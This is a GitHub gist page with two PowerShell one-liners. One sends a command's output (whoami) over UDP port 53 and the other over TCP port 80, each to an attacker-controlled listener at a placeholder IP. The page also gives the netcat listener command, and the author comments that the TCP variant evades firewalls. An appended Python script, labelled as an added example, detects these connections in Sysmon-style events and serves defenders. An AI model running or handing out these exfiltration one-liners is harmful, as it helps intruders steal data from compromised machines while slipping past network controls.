@ignis-sec
Created July 11, 2020 19:51
PowerShell one-liner that sends the output of an executed command (here whoami) out over 53/udp to a listener.
# On your host:
# $ nc -lnvup 53
# Replace <HOSTIP> with the IP address of the listening machine
powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwork,[System.Net.Sockets.SocketType]::Dgram,[System.Net.Sockets.ProtocolType]::UDP);$s.Connect((New-Object System.Net.IPEndPoint([system.net.IPAddress]::Parse(\"<HOSTIP>\"),53)));$s.send(([System.Text.Encoding]::ASCII).GetBytes((whoami)));"
ignis-sec (Author) commented Jul 11, 2020

TCP version if you need to evade firewall with a connection on HTTP port:

powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient([System.Net.IPAddress]::Parse(\"<HOSTIP>\"),80)).GetStream()));$w.WriteLine($_);$w.Flush()}"
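
Detection logic for the two one-liners on this page (the UDP/53 variant and the TCP/80 variant), written as an added example; it is not part of this gist and not the author's code. It runs over constructed Sysmon-style network-connection records (Event ID 3 fields, loosely). The sanctioned-resolver addresses, the destination IPs and the command lines in the sample records are assumed values, and the regex for socket classes is an assumption about what a command line looks like when a script host opens its own socket.

```python
"""Flag script hosts that open their own sockets to 53/udp or 80/tcp.

Added example for the exfil one-liners above, not part of the gist. Records
are constructed Sysmon-style network events; all addresses are assumptions.
"""
import re
from dataclasses import dataclass

# Interpreters that should not normally talk to 53/udp or 80/tcp themselves.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Assumption: the site's sanctioned DNS resolvers (constructed addresses).
KNOWN_RESOLVERS = {"10.0.0.2", "10.0.0.3"}

# .NET socket classes the one-liners use; seeing them in a PowerShell
# command line is a strong indicator on its own.
SOCKET_API = re.compile(
    r"System\.Net\.Sockets|TCPClient|\.GetStream\(\)|\.Send\(", re.IGNORECASE
)


@dataclass
class NetEvent:
    image: str              # full path of the process that made the connection
    protocol: str           # "udp" or "tcp"
    dest_ip: str
    dest_port: int
    command_line: str = ""  # from the matching process-create event, if joined


def classify(ev: NetEvent) -> list:
    """Return the reasons this event is suspicious (empty list if none)."""
    reasons = []
    exe = ev.image.rsplit("\\", 1)[-1].lower()
    if exe not in SCRIPT_HOSTS:
        return reasons
    proto = ev.protocol.lower()
    if proto == "udp" and ev.dest_port == 53 and ev.dest_ip not in KNOWN_RESOLVERS:
        # Datagrams to port 53 that bypass the configured resolvers are not
        # DNS lookups; the UDP one-liner above produces exactly this.
        reasons.append("udp/53 to non-resolver from script host")
    if proto == "tcp" and ev.dest_port == 80:
        # Weak on its own (Invoke-WebRequest does the same); it gains weight
        # when the command line also shows raw socket use.
        reasons.append("tcp/80 from script host")
    if SOCKET_API.search(ev.command_line):
        reasons.append("raw .NET socket API in command line")
    return reasons


def triage(events) -> dict:
    """Map the index of each flagged event to its reasons; drop the rest."""
    return {i: r for i, ev in enumerate(events) if (r := classify(ev))}


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    NetEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "udp",
             "203.0.113.10", 53,
             'powershell -nop -c "$s=New-Object System.Net.Sockets.Socket(...);$s.Send(...)"'),
    NetEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "udp",
             "10.0.0.2", 53, "powershell -c Resolve-DnsName example.com"),
    NetEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe", "tcp",
             "203.0.113.10", 80, ""),
    NetEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "tcp",
             "203.0.113.10", 80,
             'powershell -c "whoami | % {$w=(New-Object System.IO.StreamWriter((New-Object System.Net.Sockets.TCPClient(...)).GetStream()))}"'),
    NetEvent(r"C:\Program Files\PowerShell\7\pwsh.exe", "tcp",
             "203.0.113.20", 80, "pwsh -c Invoke-WebRequest http://203.0.113.20/"),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx].dest_ip, reasons)
```

Two things worth noting from the defender's side: the UDP variant sends a bare ASCII datagram to port 53 with no DNS message framing, so any resolver-enforcement or DNS-aware inspection sees non-DNS traffic on the DNS port; the TCP variant writes a single raw line and never forms an HTTP request, so an HTTP proxy or an egress rule that only permits proxied web traffic does not pass it.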
